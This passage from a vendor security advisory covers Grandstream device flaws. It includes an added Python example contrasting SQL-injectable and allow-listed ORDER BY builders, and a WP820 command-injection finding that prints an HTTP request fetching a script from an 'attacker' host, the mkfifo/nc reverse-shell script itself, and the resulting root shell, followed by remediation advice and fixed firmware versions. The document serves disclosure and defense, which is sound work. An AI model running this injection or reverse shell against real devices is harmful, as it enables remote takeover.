null, "members": "static_defense", "tmp": null }, { "extension": null,
"group_name": null, "members": "static_defense", "tmp": null }, { "extension":
null, "group_name": null, "members": "blacklist", "tmp": null }
[...]
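The sort parameters sord and sidx end up inside ORDER BY, which cannot take a bound parameter, so the fix is an allow-list of identifiers rather than parameterization. The following is an added example (not the advisory's or the vendor's code) showing the concatenating query builder the responses above imply beside a hardened builder, and a listCodeblueGroup handler that runs the hardened query against an in-memory SQLite table with bound LIMIT/OFFSET values; the table, its rows, BASE_QUERY and the function names are constructed for the example, while the column names and the injected sort order come from the requests and responses above.

```python
import sqlite3
from typing import Dict, List, Optional

# ORDER BY takes identifiers, not values, so it cannot be bound as a parameter;
# the sortable columns and directions are allow-listed instead. Column names
# follow the advisory's JSON response; the table itself is constructed.
SORTABLE_COLUMNS = {"extension", "group_name", "members"}
SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}
BASE_QUERY = "SELECT extension, group_name, members FROM codeblue_group"

# The advisory's first injected sort order, kept here as a test input.
INJECTED_SORD = 'asc;select null,"noot noot",sqlite_version(),null;--'


def build_query_unsafe(sidx: str, sord: str) -> str:
    """The pattern the advisory's responses imply: sort text pasted into SQL."""
    return f"{BASE_QUERY} ORDER BY {sidx} {sord}"


def build_query_safe(sidx: str, sord: str) -> str:
    """Accept only allow-listed identifiers; anything else is a hard error."""
    if sidx not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sidx!r}")
    direction = SORT_ORDERS.get(sord.lower())
    if direction is None:
        raise ValueError(f"unsupported sort order: {sord!r}")
    return f"{BASE_QUERY} ORDER BY {sidx} {direction}"


def safe_rejects(sidx: str, sord: str) -> Optional[str]:
    """The rejection message for a sort request, or None if it is accepted."""
    try:
        build_query_safe(sidx, sord)
    except ValueError as exc:
        return str(exc)
    return None


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the PBX's SQLite table, with two constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE codeblue_group (extension TEXT, group_name TEXT, members TEXT)")
    db.executemany("INSERT INTO codeblue_group VALUES (?, ?, ?)",
                   [("2", "apples", "1001"), ("1", "bananas", "1002")])
    return db


def list_codeblue_group(db: sqlite3.Connection, sidx: str = "extension", sord: str = "asc",
                        page: int = 1, item_num: int = 10) -> List[Dict[str, str]]:
    """Hardened handler: allow-listed ORDER BY, bound LIMIT/OFFSET values."""
    sql = build_query_safe(sidx, sord) + " LIMIT ? OFFSET ?"
    rows = db.execute(sql, (item_num, (page - 1) * item_num)).fetchall()
    return [{"extension": e, "group_name": g, "members": m} for e, g, m in rows]


if __name__ == "__main__":
    print("unsafe SQL:", build_query_unsafe("extension", INJECTED_SORD))
    print("safe rejects:", safe_rejects("extension", INJECTED_SORD))
    print(list_codeblue_group(make_db(), "extension", "desc"))
```

The unsafe builder reproduces the stacked query that the responses above show the backend executing: the injected sort order closes the original statement and appends a SELECT whose four columns line up with the handler's row shape, which is why the extra rows surface in the JSON. The hardened builder never interpolates caller-supplied text; it interpolates the matching entry from its own tables, so the worst a caller can do is receive a ValueError.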

Finding 7: Remote Code Execution in Grandstream's WP820 (WiFi Phone)

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10658

Grandstream's WP820 (WiFi Phone) firmware version 1.0.1.15 and prior is
vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.

The "priority" parameter of the getlogcat API endpoint is vulnerable to a
command injection vulnerability resulting in a root shell:

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;

Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.84
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990

----------------------------

mnz@anima:~/projects/grandstream/wp820$ nc -klvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.84 50276 received!
sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
WP820:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
WP820:/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmwladAFNFrfljVgMKFzX5JGMKh+lUa1SD+9M2xij2KQ0/
J9rWtwy/
O7AIGtUwE32jCQ8Qnf6ObmjtIGn0rmVdl7WJ3pGveeRHGjZN8vBSAnP+eXSeVFFcGzUXKlpByqiJ+Z8rPh2
nr/TDioAA6M/bfLB643qbFzqREZX678bO6yvbLI9zfexpngT/cq3BT7gCaAHZ8oI+j8rb+YSP/
tj0s31E0TIUsD2r/
LueRvHRXjXBfl3FOaatwXwHiKXge+qs9RfidnAwFYlcH3D5UleBVdkzsT3HOWmij0O/
xtsUVixz3HJmZNNtT6m/9qiEj4jAcU/c6SYjeF3p/FbkggUt7M8Q== xtli@time-machine
Fingerprint: md5 c4:20:ea:09:79:3c:f6:71:90:db:ae:e9:8c:16:c4:90
WP820:/ #

------------------------------

Remediation Steps:
Ensure all devices are up to date and running the latest firmware; turn on
automatic updates; change all default credentials on the devices for all accounts;
run the devices on a separate network from those accessing sensitive information;
disable access to all services that aren't required on the device; and upgrade
any end-of-life devices that are no longer receiving security updates.

The firmware versions that were released to address these findings include:

Pre Auth RCE
GAC2500 -- fixed in firmware 1.0.3.37 (Beta)
GXP2200 -- no plan to fix due to discontinued product
GVC3202 -- Plan to be fixed in next firmware release
GXV3275 -- fixed in firmware 1.0.3.219 (Beta)
GXV3240 -- fixed in firmware 1.0.3.219 (Beta)

Post Auth RCE
GXV3611IR_HD -- fixed in firmware 1.0.3.23
UCM6204 -- fixed in firmware 1.0.19.20 (Beta)
GXV3370 -- fixed in firmware 1.0.1.41 (Beta)
WP820 -- fixed in firmware 1.0.3.6
GWN7000 -- fixed in firmware 1.0.6.32
GWN7610 -- fixed in firmware 1.0.8.18

Please note that Trustwave has not verified all the vendor supplied fixes.

Revision History:
12/06/2018 : Vulnerabilities disclosed to vendor
02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202
03/01/2019 : Vendor announces firmware updates available for GWN7000
03/22/2019 : Advisory 1.0 published
03/27/2019 : Advisory 2.0 published
04/05/2019 : Advisory 3.0 published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
